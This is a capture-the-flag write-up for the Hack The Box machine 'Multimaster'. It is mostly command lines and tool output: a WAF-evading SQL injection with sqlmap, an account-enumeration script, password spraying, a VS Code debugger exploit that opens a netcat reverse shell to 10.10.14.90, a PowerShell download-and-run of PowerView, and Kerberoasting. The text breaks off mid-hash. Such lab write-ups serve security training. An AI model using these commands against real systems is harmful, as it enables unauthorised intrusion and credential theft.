HTB Multimaster Writeup

Writeup for HTB Multimaster Box

Multimaster Writeup

images/Untitled.png

As usual we start the enumeration with a nmap scan to find open ports and services running on them.

# Nmap 7.80 scan initiated Fri Sep 18 14:47:46 2020 as: nmap -sC -sV -oA nmap/tcp-initial -vv 10.10.10.179
Nmap scan report for 10.10.10.179
Host is up, received echo-reply ttl 127 (0.27s latency).
Scanned at 2020-09-18 14:47:47 IST for 344s
Not shown: 987 filtered ports
Reason: 987 no-responses
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain?       syn-ack ttl 127
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-09-18 09:31:14Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds  syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGACORP)
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Issuer: commonName=MULTIMASTER.MEGACORP.LOCAL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T04:51:25
| Not valid after:  2021-03-19T04:51:25
| MD5:   0f32 4df3 e278 23d4 2818 2548 f349 b07c
| SHA-1: 0499 8cf5 c964 9e48 e4e5 ef7d 4352 d0e9 7e40 8d14
| -----BEGIN CERTIFICATE-----
| MIIC+DCCAeCgAwIBAgIQJp4l148Hmq1CJ4gpz/fcUjANBgkqhkiG9w0BAQsFADAl
| MSMwIQYDVQQDExpNVUxUSU1BU1RFUi5NRUdBQ09SUC5MT0NBTDAeFw0yMDA5MTcw
| NDUxMjVaFw0yMTAzMTkwNDUxMjVaMCUxIzAhBgNVBAMTGk1VTFRJTUFTVEVSLk1F
| R0FDT1JQLkxPQ0FMMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAknsU
| m5CuoryhUKsbZj5Zgiu/IvNVHXrWVzUBfzrixwmb+1gYss86niUzbXxLrLqjtK1j
| Vrn/yKGh/F008N37eIejOWdm6OfxTY6Km+VqhKURuVDc52ZHjsWoYyBVpO/5rA1+
| 3vIRn/GVAl1cA8kMTs0BG6l06GIvgb3JZJupcgjpdSHWQozJHIWH0Y3AH4cnRm/T
| pFg3Y/a2BaR4520UdwqrqLdi/o0QdqBEqaDNrqAfpqq2Z4QRWB4jlM3+f+dRaAPl
| sTLkbF7ij1ZER7VHdMdHIpV8+ylzQxqdlwMuZXT8L/P/GquIgve3TB2kUGz+40NX
| 2ss+cvEiTyXdKEgwBwIDAQABoyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNV
| HQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBABl0GcSk6jw4RaSPCpfmA8NBsELd
| PB10/zR7UsPOzqKWa4uCiwVfyKS/+xl887xmCspYrjceB/eR5JiCZPwALajYGJFE
| 5LGPS8EGvVRpVVXw19UNipch3bdRl1mOmiRozutPLO6+9/5eyFTQ+nBEtttWlovA
| anUINlt2lvouedqDTL41lG7TKYxc4cXw+mW9WfOOSfU0PzOOXVbIt8QybxeUGcp3
| 96m18W2OI6J3e0kMAuqQaBsk+y65wjWBNolT3VY0zXz4tTawbb0Hnfha8Z185Uls
| gRo9D5gpwQVB/8gPQi7U84i/Uhb3/s5wtzblmeY76XydrNsdOki6t5cFUA4=
|_-----END CERTIFICATE-----
|_ssl-date: 2020-09-18T09:34:33+00:00; +13m04s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/18%Time=5F647B56%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 13m03s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 41922/tcp): CLEAN (Timeout)
|   Check 2 (port 28462/tcp): CLEAN (Timeout)
|   Check 3 (port 4805/udp): CLEAN (Timeout)
|   Check 4 (port 42275/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3.00: 
|_    Message signing enabled and required
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 18 14:53:31 2020 -- 1 IP address (1 host up) scanned in 344.84 seconds

we find that the server is a domain controller and also there is a web server running to we begin to enumerate the web service. Visiting the web service on port 80 we get treated with a custom web application.

images/Untitled%201.png

This web application has a Colleague Finder searching feature which allows us to enumerate users.

images/Untitled%202.png

Intercepting the requests using burpsuite we find that the Colleague Finder feature is actually making post requests to /api/getColleagues endpoint

images/Untitled%203.png

So we start enumerating this endpoint to look for some vulnerability. Now when we try to inject a basic sql injection payload we find that our request is now being cancelled and been given 403 Forbidden error.

images/Untitled%204.png

This suggests that their might be some web application firewall in place on the server. After some hit and trial we find that we can bypass the WAF by unicode escaping the characters.

images/Untitled%205.png

now we can use sqlmap with charunicodeescape tamper script to confirm SQL Injection

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]
└─$ sqlmap -r ./api.req --tamper=charunicodeescape --batch --delay=1 --proxy=http://127.0.0.1:8080 --level=3 --risk=3 --dbms=MSSQL
...
[15:34:41] [INFO] (custom) POST parameter 'JSON #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
---
Parameter: JSON #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: {"name":"' AND 1564=1564-- dBur"}

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: {"name":"-9204' UNION ALL SELECT 50,50,50,CHAR(113)+CHAR(120)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(114)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(97)+CHAR(121)+CHAR(99)+CHAR(99)+CHAR(119)+CHAR(81)+CHAR(68)+CHAR(76)+CHAR(83)+CHAR(116)+CHAR(117)+CHAR(80)+CHAR(81)+CHAR(70)+CHAR(79)+CHAR(84)+CHAR(77)+CHAR(88)+CHAR(107)+CHAR(78)+CHAR(103)+CHAR(105)+CHAR(110)+CHAR(71)+CHAR(88)+CHAR(105)+CHAR(106)+CHAR(118)+CHAR(70)+CHAR(117)+CHAR(112)+CHAR(111)+CHAR(66)+CHAR(107)+CHAR(77)+CHAR(66)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(113),50-- GvQs"}
---
[15:34:41] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:34:41] [INFO] testing Microsoft SQL Server
[15:34:43] [INFO] confirming Microsoft SQL Server
[15:34:48] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2017
[15:34:48] [INFO] fetched data logged to text files under '/home/codacker/.local/share/sqlmap/output/10.10.10.179'

[*] ending @ 15:34:48 /2020-09-18/

Now as sqlinjection is confirm we can enumerate databases present on the server.

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]                                                                                                               
└─$ sqlmap -r ./api.req --tamper=charunicodeescape --batch --delay=1 --proxy=http://127.0.0.1:8080 --level=3 --risk=3 --dbms=MSSQL --dbs
...
[15:36:27] [INFO] retrieved: 'Hub_DB'
[15:36:29] [INFO] retrieved: 'master'
[15:36:31] [INFO] retrieved: 'model'
[15:36:33] [INFO] retrieved: 'msdb'
[15:36:36] [INFO] retrieved: 'tempdb'
available databases [5]:                                                                                                                                             
[*] Hub_DB
[*] master
[*] model
[*] msdb
[*] tempdb

[15:36:36] [INFO] fetched data logged to text files under '/home/codacker/.local/share/sqlmap/output/10.10.10.179'

[*] ending @ 15:36:36 /2020-09-18/

Now we can enumerate tables from Hub_DB database

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]
└─$ sqlmap -r ./api.req --tamper=charunicodeescape --batch --delay=1 --proxy=http://127.0.0.1:8080 --level=3 --risk=3 --dbms=MSSQL -D Hub_DB --tables
...
[15:38:14] [INFO] fetching tables for database: Hub_DB
[15:38:18] [INFO] retrieved: 'dbo.Colleagues'
[15:38:22] [INFO] retrieved: 'dbo.Logins'
Database: Hub_DB                                                                                                                                                     
[2 tables]
+------------+
| Colleagues |
| Logins     |
+------------+

[15:38:22] [INFO] fetched data logged to text files under '/home/codacker/.local/share/sqlmap/output/10.10.10.179'

[*] ending @ 15:38:22 /2020-09-18/

Dumping Logins table we can get hashes.

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]
└─$ sqlmap -r ./api.req --tamper=charunicodeescape --batch --delay=1 --proxy=http://127.0.0.1:8080 --level=3 --risk=3 --dbms=MSSQL -D Hub_DB -T Logins --dump
...
do you want to use common password suffixes? (slow!) [y/N] N
[15:45:17] [INFO] starting dictionary-based cracking (sha384_generic_passwd)
[15:45:17] [INFO] starting 2 processes 
[15:45:42] [WARNING] no clear password(s) found                                                                                                                      
Database: Hub_DB
Table: Logins
[17 entries]
+----+--------------------------------------------------------------------------------------------------+----------+
| id | password                                                                                         | username |
+----+--------------------------------------------------------------------------------------------------+----------+
| 1  | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 | sbauer   |
| 2  | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa | okent    |
| 3  | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 | ckane    |
| 4  | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 | kpage    |
| 5  | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 | shayna   |
| 6  | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 | james    |
| 7  | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 | cyork    |
| 8  | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa | rmartin  |
| 9  | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 | zac      |
| 10 | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 | jorden   |
| 11 | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa | alyx     |
| 12 | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 | ilee     |
| 13 | fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa | nbourne  |
| 14 | 68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813 | zpowers  |
| 15 | 9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739 | aldom    |
| 16 | cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc | minatotw |
| 17 | cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc | egre55   |
+----+--------------------------------------------------------------------------------------------------+----------+

[15:45:42] [INFO] table 'Hub_DB.dbo.Logins' dumped to CSV file '/home/codacker/.local/share/sqlmap/output/10.10.10.179/dump/Hub_DB/Logins.csv'
[15:45:42] [INFO] fetched data logged to text files under '/home/codacker/.local/share/sqlmap/output/10.10.10.179'

[*] ending @ 15:45:42 /2020-09-18/

we see that their are only 4 unique hashes in the dump and now we can crack 3 of them using hashcat with rockyou wordlist.

┌──(codacker㉿kali)-[/usr/share/wordlists]
└─$ hashcat -m 17900 -a 0 hashes /usr/share/wordlists/rockyou.txt                                                                                               255 ⨯
hashcat (v6.1.1) starting...
...
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739:password1
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813:finance1
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa:banking1

Now we have some passwords now we need to enum usernames on the domain controller which can be done using SUSER_SNAME feature of MSSQL Server (for more details https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/) we can write a script to bruteforce uid of users and get username for them. The script which i wrote is

#!/usr/bin/env python3
from encode import tamper as e
import requests
from time import sleep
import json
import binascii
import struct
# print(e("-1' union all select 1,2,3,4,5-- "))

def inject(query = "4"):
	r = requests.post('http://10.10.10.179/api/getColleagues', 
		headers = {"Content-Type": "application/json"},
		data = "{name:\""+e(f"-1' union all select 1,2,3,{query},5-- ")+"\"}", 
		proxies= {"http":"http://127.0.0.1:8080"})
	if r.status_code == 200:
		try:
			return json.loads(r.text)[0]["email"]
		except:
			pass
	return "Failed"

domain_sid = "0x0105000000000005150000001c00d1bcd181f1492bdfc236"
print(inject("sys.fn_varbintohexstr(SUSER_SID('MEGACORP\\Administrator'))"))
print(inject("SUSER_SNAME(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000)"))

for i in range(1100, 2000):
	rid = binascii.hexlify(struct.pack("<I", i)).decode()
	print(f"{domain_sid+rid}:" + inject(f"SUSER_SNAME({domain_sid+rid})"))
	sleep(1)

Running the script we get a list of usernames

images/Untitled%206.png

now we have a list of usernames and passwords and hence we can use crackmapexec to perform a password spray attack.

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]
└─$ crackmapexec smb 10.10.10.179 -u domain_user_dump.txt -p passwords.txt 
SMB         10.10.10.179    445    MULTIMASTER      [*] Windows Server 2016 Standard 14393 (name:MULTIMASTER) (domain:MEGACORP.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\DnsAdmins:password1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\DnsAdmins:finance1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\DnsAdmins:banking1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\DnsUpdateProxy:password1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\DnsUpdateProxy:finance1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\DnsUpdateProxy:banking1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\svc-nas:password1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\svc-nas:finance1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\svc-nas:banking1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\Privileged IT Accounts:password1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\Privileged IT Accounts:finance1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\Privileged IT Accounts:banking1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [-] MEGACORP\tushikikatomo:password1 STATUS_LOGON_FAILURE 
SMB         10.10.10.179    445    MULTIMASTER      [+] MEGACORP\tushikikatomo:finance1

we get a hit on user tushikikatomo with password finance1 we can login using these creds using evil-winrm and we can get user hash

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]
└─$ evil-winrm -i 10.10.10.179 -u tushikikatomo -p finance1

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\alcibiades\Documents> whoami
megacorp\tushikikatomo
*Evil-WinRM* PS C:\Users\alcibiades\Documents> gc ..\desktop\user.txt
8c386c71bcc5564fe107cb514ad84bd6

Now performing some enumeration using winPEAS.exe, we see that vscode is installed on the server

images/Untitled%207.png

and vscode is running as well.

*Evil-WinRM* PS C:\Users\alcibiades\Documents> get-process *                                                                                                          
                                                                                                                                                                      
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     67       5     2064       3688              4444   1 cmd 
     49       3     1572       2752              6408   1 cmd    
    407      58   137944     180368               192   1 Code   
    406      53    95816      47308               864   1 Code    
    276      51    57840      37408              3012   1 Code     
    404      54    95748     135356              3060   1 Code   
    276      51    58176      21736              3860   1 Code   
    234      15     6124       4168              3864   1 Code   
    708      60    34940      96220              4140   1 Code   
    277      51    58284      60680              5084   1 Code   
    404      54    95276      78768              5420   1 Code   
    429      23    15980       9292              5468   1 Code   
    407      55    96892     113760              5620   1 Code   
    278      51    58316      74340              5832   1 Code   
    324      32    42332      27808              6044   1 Code   
    278      51    58224      74740              6340   1 Code

there is a recent CVE found in microsoft vscode (for more info: https://bugs.chromium.org/p/project-zero/issues/detail?id=1944 ) we can test for it using cefdebug tool (https://github.com/taviso/cefdebug) and we can confirm that vscode is running on the server and is vulnerable to code execution

*Evil-WinRM* PS C:\Users\alcibiades\Documents> .\cefdebug.exe
cefdebug.exe : [2020/09/18 04:20:45:5482] U: There are 6 tcp sockets in state listen.
    + CategoryInfo          : NotSpecified: ([2020/09/18 04:...n state listen.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
[2020/09/18 04:21:05:6337] U: There were 4 servers that appear to be CEF debuggers.
[2020/09/18 04:21:05:6337] U: ws://127.0.0.1:58601/45ee1358-d11c-4893-b8d9-6f751dee2122
[2020/09/18 04:21:05:6337] U: ws://127.0.0.1:55568/4d46ebc5-e07e-492f-99b5-2fc52afc70f6
[2020/09/18 04:21:05:6337] U: ws://127.0.0.1:31661/3c1ba038-614b-45ae-b3f0-093d9d920415
[2020/09/18 04:21:05:6337] U: ws://127.0.0.1:47076/13f5984a-44b8-4ad9-883b-6bdcaa935782

no w we can get a remote shell as the user which is running vscode using netcat

*Evil-WinRM* PS C:\Users\alcibiades\Documents> .\cefdebug.exe --code "process.mainModule.require('child_process').exec('cmd.exe /c C:/tmp/nc.exe  10.10.14.90 9001 -e cmd.exe')" --url 'ws://127.0.0.1:64587/48a0ae30-0394-4157-9411-627ce31ee37d'
cefdebug.exe : [2020/09/18 04:32:53:9392] U: >>> process.mainModule.require('child_process').exec('cmd.exe /c C:/tmp/nc.exe  10.10.14.90 9001 -e cmd.exe')
    + CategoryInfo          : NotSpecified: ([2020/09/18 04:...01 -e cmd.exe'):String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
[2020/09/18 04:32:53:9392] U: <<< ChildProcess
*Evil-WinRM* PS C:\Users\alcibiades\Documents>

and we get a reverse shell back to us

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]
└─$ rlwrap nc -nlvp 9001                                                                                                                                          1 ⨯
listening on [any] 9001 ...
connect to [10.10.14.90] from (UNKNOWN) [10.10.10.179] 50171
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Program Files\Microsoft VS Code>whoami
whoami
megacorp\cyork

C:\Program Files\Microsoft VS Code>

now after some enumeration we find MultimasterAPI.dll file which contains code for API of the web application. The DLL file is a .Net Assembly file and hence we can decompile it using ilspy

images/Untitled%208.png

Inside we find password for the database as D3veL0pM3nT! we can also get the updated list of users as now we have shell on the server

*Evil-WinRM* PS C:\Users\alcibiades\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            aldom                    alice
alyx                     andrew                   ckane
cyork                    dai                      DefaultAccount
Guest                    ilee                     james
jorden                   jsmmons                  kpage
krbtgt                   lana                     nbourne
okent                    pmartin                  rmartin
sbauer                   svc-nas                  svc-sql
tushikikatomo            zac                      zpowers
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\alcibiades\Documents>

Running crackmapexec once again with updated username and password list to perform a password spray attack

images/Untitled%209.png

we get a hit for user sbauer now we can login as sbauer user using evil-winrm

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]
└─$ evil-winrm -i 10.10.10.179 -u sbauer -p 'D3veL0pM3nT!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\sbauer\Documents> whoami
megacorp\sbauer
*Evil-WinRM* PS C:\Users\sbauer\Documents>

Now to perform further domain enumeration we can run bloodhound with sharphound ingester to find some misconfigurations. We find that the user [email protected] has generic write access to the user [email protected].

images/Untitled%2010.png

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

So we can load powerview.ps1 from powersploit framework (https://github.com/PowerShellMafia/PowerSploit) in

PS C:\Users\sbauer\Documents> IEX (New-Object Net.WebClient).downloadString('http://10.10.14.90/new_powerview.ps1')
IEX (New-Object Net.WebClient).downloadString('http://10.10.14.90/powerview.ps1')
PS C:\Users\sbauer\Documents> $SecPassword = ConvertTo-SecureString 'D3veL0pM3nT!' -AsPlainText -Force                 
$SecPassword = ConvertTo-SecureString 'D3veL0pM3nT!' -AsPlainText -Force                                                                                              
PS C:\Users\sbauer\Documents> $Cred = New-Object System.Management.Automation.PSCredential('MEGACORP.LOCAL\sbauer', $SecPassword)
$Cred = New-Object System.Management.Automation.PSCredential('MEGACORP.LOCAL\sbauer', $SecPassword)                    
PS C:\Users\sbauer\Documents> Set-DomainObject -Credential $Cred -Identity jorden -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Set-DomainObject -Credential $Cred -Identity jorden -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
PS C:\Users\sbauer\Documents> Get-DomainSPNTicket -Credential $Cred -SPN "nonexistent/BLAHBLAH" | fl
Get-DomainSPNTicket -Credential $Cred -SPN "nonexistent/BLAHBLAH" | fl
WARNING: [Invoke-UserImpersonation] Executing LogonUser() with user: MEGACORP.LOCAL\sbauer

SamAccountName       : UNKNOWN
DistinguishedName    : UNKNOWN
ServicePrincipalName : nonexistent/BLAHBLAH
TicketByteHexStream  : 
Hash                 : $krb5tgs$23$*UNKNOWN$UNKNOWN$nonexistent/BLAHBLAH*$06282312B8B6465FEB15CBE76DD93B07$013FA7B4008B
                       6B0D2ECC995818B4AD53C751FBD4860A8C3A5F562C503C1F597A7A0B924FD64A2938B7D710FFB31D62057A58AF4C7322
                       13BDF7434495DF79800CAA90D62367B9DD4AFC0F53854247379BE3A9B9D9AA908230BBB12E6FEB21238D0032DB59CE23
                       0C73544A1937490F7DFCCA757D85B34F2C0312949BF8D2151B9F3C34AFD46ADD53AA38F986072BCD25C3E915F5009D60
                       06A97E73CCFF218AD86C6A51BE008D71BAE7303493EBB3DCF48DA19D19B8767F0B862C365FE02E09818F28F058087C57
                       11DAD71BD3BF13E4CA5C4032E1C23CA97C17CB6FF49F5E34A86AFDFD222E602F2D324321529585F8129F48B3A007137D
                       B88FC11A17B4A8ADC0DABB338FE3C5E078D07789EF5165BD981D1F8C0B746B68C9F7A461E1FD642E6F60A77A359AA96C
                       05087486B1A7FF619984E1DB3E1081CF7883067152FE307F4FD9982EC19042ED885498074A089BAD7A203E8F6C97BB84
                       EB34932DAC6BCF03C25D2D8E3A863B25B35A714249E9A3F72080C272AB46A0D8815C6F122FA97EE937394A3771F47CDB
                       1346ACCF35F507F59A60D27FEB9453E1798F4CD1EA8E2BFBE6B5FE4C5CECC6803E5239DA373C49CCE900D5799776A83E
                       1EFD4950E85421000ED84FC18740218CE180E6515AFC384D892CC9AE0485BF8BE265D3115C9421F740CDE838BAFEC141
                       E7474A72E56C2EBF85E4CB79E933955665DDA822DE7E86532B4415CC5ABC47282F77127C00D4DAC3834FF2DEE65EBFDC
                       8E2A00F5C53156F759C5C874F307A366F4095002BDC8985C5BAA264EC1D0B5D28A174E997D4CE279EA5AF72C5152209A
                       6D90AF243F5FEC4D93C5084F65E989AC989D9625E77D58EB2D6BB1E9DB78B6A7680B2DD92991892FD09982BC8C3D145C
                       5DC94BF49A55ADB1E4AEF42C726F2EDD7A356D2592065CC9302B6826CEF7F769F55A6AADFFA9F74B0DCCA26BB7E72DB1
                       9E6195028E581E76A6D4FA1800400958B17FF2D4A1D0C7E3ADB44E396BC0A3F1B0959C5B63DBDD7ECBA147DB7E1DC20C
                       C45CFD17CB0EBF8452A9A5BD00B4A951E0FA2D3A02BB013443EA136E1B298DBD55ADA03D0FD68EFF1CDDAFF971A1AEDF
                       C0C11AC251B3478DD7A293935EEAEEE6E70E0ABA946683161A925128D4602E476E05CE53F8B7105078EBA74BAE373911
                       3530FBD48C6E0BAA333EA999A98487C234984CB9D6527AE1626DAC9A25C633332EE9F627E969B7D7374D1C330DBD306E
                       335D8B8CA91130E407E32D7E3CECAB2CDE9B5648233EA4C10AC32AC39CA822AA1CFE6646A62FE2AECE94B3C31A088D97
                       007C26F48A13EE6399649CBDE65337038DEB924E043B839A88B79C008F60082C247FCA073CA2CF5FB22868B1546A1AF9
                       0B61B1D4A8D7CA4DB457BDB9EF5FA9BD7B0341D21CB696AF3B565CE357947FB40ABA5A7FDD5CA9F2C92C9555FE090075
                       72512BCD01F4FDDF22AE3D9ABE63C68A15C802B0E4A473C93EDDD1C35C6D912643DF04CAB14AB764B729EAE8A2FF3303
                       6FC1FA83D11F02E7EF8A5386296554DF7D

WARNING: [Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle

now we can crack the hash using hashcat

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]
└─$ hashcat -m 13100 -a 0 jorden.hash /usr/share/wordlists/rockyou.txt
...
$krb5tgs$23$*UNKNOWN$UNKNOWN$nonexistent/BLAHBLAH*$06282312b8b6465feb15cbe76dd93b07$013fa7b4008b6b0d2ecc995818b4ad53c751fbd4860a8c3a5f562c503c1f597a7a0b924fd64a2938b7d710ffb31d62057a58af4c732213bdf7434495df79800caa90d62367b9dd4afc0f53854247379be3a9b9d9aa908230bbb12e6feb21238d0032db59ce230c73544a1937490f7dfcca757d85b34f2c0312949bf8d2151b9f3c34afd46add53aa38f986072bcd25c3e915f5009d6006a97e73ccff218ad86c6a51be008d71bae7303493ebb3dcf48da19d19b8767f0b862c365fe02e09818f28f058087c5711dad71bd3bf13e4ca5c4032e1c23ca97c17cb6ff49f5e34a86afdfd222e602f2d324321529585f8129f48b3a007137db88fc11a17b4a8adc0dabb338fe3c5e078d07789ef5165bd981d1f8c0b746b68c9f7a461e1fd642e6f60a77a359aa96c05087486b1a7ff619984e1db3e1081cf7883067152fe307f4fd9982ec19042ed885498074a089bad7a203e8f6c97bb84eb34932dac6bcf03c25d2d8e3a863b25b35a714249e9a3f72080c272ab46a0d8815c6f122fa97ee937394a3771f47cdb1346accf35f507f59a60d27feb9453e1798f4cd1ea8e2bfbe6b5fe4c5cecc6803e5239da373c49cce900d5799776a83e1efd4950e85421000ed84fc18740218ce180e6515afc384d892cc9ae0485bf8be265d3115c9421f740cde838bafec141e7474a72e56c2ebf85e4cb79e933955665dda822de7e86532b4415cc5abc47282f77127c00d4dac3834ff2dee65ebfdc8e2a00f5c53156f759c5c874f307a366f4095002bdc8985c5baa264ec1d0b5d28a174e997d4ce279ea5af72c5152209a6d90af243f5fec4d93c5084f65e989ac989d9625e77d58eb2d6bb1e9db78b6a7680b2dd92991892fd09982bc8c3d145c5dc94bf49a55adb1e4aef42c726f2edd7a356d2592065cc9302b6826cef7f769f55a6aadffa9f74b0dcca26bb7e72db19e6195028e581e76a6d4fa1800400958b17ff2d4a1d0c7e3adb44e396bc0a3f1b0959c5b63dbdd7ecba147db7e1dc20cc45cfd17cb0ebf8452a9a5bd00b4a951e0fa2d3a02bb013443ea136e1b298dbd55ada03d0fd68eff1cddaff971a1aedfc0c11ac251b3478dd7a293935eeaeee6e70e0aba946683161a925128d4602e476e05ce53f8b7105078eba74bae3739113530fbd48c6e0